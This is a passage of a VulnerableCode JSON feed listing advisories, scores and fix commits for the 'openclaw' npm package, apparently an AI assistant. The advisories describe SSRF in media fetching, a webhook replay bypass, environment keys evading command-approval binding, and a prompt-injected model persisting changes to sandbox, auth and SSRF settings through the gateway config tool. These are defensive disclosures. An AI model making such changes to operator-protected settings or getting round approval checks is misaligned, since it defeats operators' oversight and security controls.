"VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "GHSA-pg8g-f2hf-x82m" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-73cz-n29z-uqem" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88979?format=api", "vulnerability_id": "VCID-75yr-sbce-nkah", "summary": "OpenClaw QQ Bot Extension missing SSRF Protection on All Media Fetch Paths\n## Impact\n\nQQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths.\n\nQQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @adithyan-ak for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41914", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11193", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11153", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11187", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41914" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fv3-6p2v-gxwj", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:55:12Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fv3-6p2v-gxwj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41914", "reference_id": "CVE-2026-41914", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41914" }, { "reference_url": "https://github.com/advisories/GHSA-3fv3-6p2v-gxwj", "reference_id": "GHSA-3fv3-6p2v-gxwj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3fv3-6p2v-gxwj" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths", "reference_id": "openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:55:12Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-41914", "GHSA-3fv3-6p2v-gxwj" ], "risk_score": 3.9, "exploitability": "0.5", "weighted_severity": "7.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-75yr-sbce-nkah" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89144?format=api", "vulnerability_id": "VCID-7akj-469t-57hz", "summary": "OpenClaw: Agent gateway config mutations could change protected operator settings\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe agent-facing `gateway config.patch` / `config.apply` guard did not cover several operator-trusted settings, including sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening. A prompt-injected model with access to the owner-only gateway tool could persist changes to those settings.\n\nThis is a model-to-operator guard bypass, not a remote unauthenticated gateway compromise. Severity is medium.\n\n## Fix\n\nOpenClaw now blocks model-driven gateway config mutations for the broader operator-trusted path set and covers per-agent overrides and array-entry patching.\n\nFix commit:\n\n- `fe30b31a97a917ecc6e92f6c85378b6b20352422`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc" }, { "reference_url": "https://github.com/advisories/GHSA-7jm2-g593-4qrc", "reference_id": "GHSA-7jm2-g593-4qrc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7jm2-g593-4qrc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "GHSA-7jm2-g593-4qrc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7akj-469t-57hz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90184?format=api", "vulnerability_id": "VCID-7dyw-9b37-yqh4", "summary": "OpenClaw: Zalo webhook replay cache cross-target messageId scope bypass\n## Summary\nZalo webhook replay cache cross-target messageId scope bypass\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: v2026.3.28 replay dedupe is still keyed too broadly, but the issue should stay scoped to authenticated sibling-target delivery paths rather than arbitrary unauthenticated attackers.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — 2026-03-31T19:33:57+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41402", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11323", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11356", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11364", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41402" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hhq4-97c2-p447", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hhq4-97c2-p447" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41402", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41402" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-cache-cross-target-messageid-scope-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:17:15Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-cache-cross-target-messageid-scope-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-hhq4-97c2-p447", "reference_id": "GHSA-hhq4-97c2-p447", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hhq4-97c2-p447" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41402", "GHSA-hhq4-97c2-p447" ], "risk_score": 1.9, "exploitability": "0.5", "weighted_severity": "3.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7dyw-9b37-yqh4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89799?format=api", "vulnerability_id": "VCID-7ntr-5dr5-9uf8", "summary": "OpenClaw: Windows-compatible env override keys could bypass system.run approval binding\n## Summary\n\nBefore OpenClaw 2026.4.2, system-run approval binding normalized environment override keys differently from host execution. Windows-compatible keys could be omitted from the approval binding while still being injected at execution time.\n\n## Impact\n\nAn approved command could run with attacker-chosen environment overrides that were not represented in the approval binding. This created an approval-integrity gap for affected host-exec flows.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d` — align approval binding with execution-time env-key normalization\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @iskindar for reporting, and thanks @wsparks-vc for coordination.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/7eb094a00d80e9f6bf0e62f2c45d3b88ff67c04d" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47" }, { "reference_url": "https://github.com/advisories/GHSA-98ch-45wp-ch47", "reference_id": "GHSA-98ch-45wp-ch47", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-98ch-45wp-ch47" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": 